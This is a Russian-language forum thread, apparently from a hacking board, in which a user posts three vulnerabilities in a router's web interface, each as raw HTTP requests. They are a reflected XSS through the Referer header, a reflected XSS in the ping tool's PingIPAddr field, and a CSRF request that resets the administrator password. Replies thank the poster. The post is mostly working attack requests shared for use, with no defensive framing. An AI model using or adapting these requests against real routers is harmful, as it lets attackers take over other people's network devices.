XSS

xxxxxxxxxxxxxxxxxxxxx

GoodBoy

Пользователь
Регистрация
31/1/11
Сообщения
192
Возраст
40
1. Отраженная XSS-уязвимость неавторизованных пользователей в поле "Referer" при обращении к несуществующим URL-адресам на роутере.
Код:

Код:
GET /doesnotexist HTTP/1.1
Host: 192.168.1.1
Referer: http://fent">alert("XSS")
Connection: keep-alive

2. Отраженная XSS-уязвимость но уже для авторизованных пользователей, в одной из диагностических команд - ping - на странице /Forms/tools_test_1 в аргументе PingIPAddr.
Код:


Код:
Host: 
Referer: http:///maintenance/tools_test.htm
Authorization: Basic blablabla==
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 164

Test_PVC=PVC0&PingIPAddr=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&pingfl ag=1&trace_open_fl ag=0&InfoDisplay=Ping+request+could+not+fi nd+host+

3. CSRF-уязвимость позволяет сбросить пароль администратора. Для атаки создаем HTML-страницу, которая отправляет следующий запрос:
Код:

Код:
http:///Forms/tools_admin_1?uiViewTools_Password=PWNED&uiViewTools_PasswordConfi rm=PWNED
 

LaresGAM

Модератор
Регистрация
26/12/10
Сообщения
688
Хорошая инфа, как всегда спасибо!
 

Hawk BZ

Пользователь
Регистрация
19/1/11
Сообщения
208
Теперь насытили этими кодами раздел